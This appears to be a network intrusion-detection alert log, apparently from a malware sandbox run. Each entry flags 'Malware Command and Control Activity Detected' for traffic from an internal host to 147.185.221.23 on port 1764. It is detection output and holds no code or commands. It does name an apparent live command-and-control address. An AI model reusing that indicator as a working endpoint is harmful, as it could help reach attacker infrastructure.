                      2024-10-13T19:10:57.266046+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.368611+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.469906+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.563230+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.690848+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.752587+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.859761+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:57.953568+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.047221+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.141035+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.267166+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.387247+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.485042+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.582168+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:58.805690+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.089722+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.188765+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.283071+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.389811+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.520927+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.625699+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.722669+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.844619+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:10:59.938355+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.047607+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.157077+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.250861+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.344163+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.458163+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.547275+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.641390+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.734960+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.829977+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:00.922521+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.017983+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.109853+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.204071+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.352072+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.696756+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.904547+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:01.984754+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.063183+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.141127+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.220543+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.297600+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.375331+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.469267+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.563472+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.641011+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.726889+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.813000+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.891082+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:02.969846+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.047375+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.178809+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.241533+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.328526+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.406673+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.484730+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.562951+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.651179+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.719259+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.828599+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:03.934912+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.036113+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.126282+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.467330+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.629264+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.703479+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:04.953915+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.031913+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.109957+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.188191+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.289096+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.382965+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.454253+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.532039+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.625487+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.703864+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.796472+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.877676+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:05.994046+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.078508+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.157324+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.251106+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.329419+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.411540+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.486429+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.562991+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.648579+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.728603+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:06.842910+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.275759+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.366278+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.464265+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.531688+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.625417+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.703543+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.781548+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.873080+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:07.954063+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.041085+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.110057+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.187919+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.266034+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.370899+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.422216+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.500318+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.562816+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.626756+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.703451+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.769495+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.859764+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:08.923871+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.000573+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.071349+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.143780+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.220504+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.297393+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.363791+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.422071+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.485766+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.562867+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.667938+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.805118+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:09.968605+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.047808+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.125204+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.206214+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.265945+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.328833+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.407986+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.469278+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.547342+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.625398+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.703428+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:10.765898+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.038918+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.063706+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.141619+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.245038+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.312773+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.375610+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.437805+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.501051+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.579737+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.640930+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.718992+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.797336+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.910741+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:11.953559+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.031591+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.094001+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.157104+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.223051+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.300355+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.359751+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.422311+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.484775+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.547495+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.623567+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.704505+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.768184+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.848456+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:12.931827+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.113164+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.182061+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.274264+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.344200+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.437898+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.516273+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:13.579682+020028528731Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:59.261133+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.391540+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.515542+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.640594+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.765543+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.876150+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.984396+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.112129+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.234808+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.359237+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.468663+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.578019+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.687691+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.815588+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.937477+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.062882+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.172093+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.296950+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.424126+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.544110+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.699152+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.955401+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.078554+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.190449+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.299153+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.416301+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.531163+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.658906+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.781105+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.907401+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.015816+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.125062+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.238749+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.359315+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.470187+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.578016+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.687491+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.798218+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.906521+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.015572+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.137709+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.249949+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.717676+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.921795+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.031402+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.140709+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.250107+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.360379+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.484216+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.593683+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.719197+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.845301+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.982159+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.109854+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.235595+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.359315+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.414663+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.468748+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.531166+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.593702+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.656311+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.719237+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.766067+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.860147+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.875083+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.985208+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.995198+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.112189+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.122277+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.236106+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.243518+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.359736+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.370006+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.488322+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.498778+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.614910+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.634326+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.762718+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.770309+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.888843+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.899902+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.026691+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.034864+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.171861+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.171990+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.291309+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.301024+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.436985+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.469876+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.569793+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.612440+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.693401+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.747892+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.836868+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.924912+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
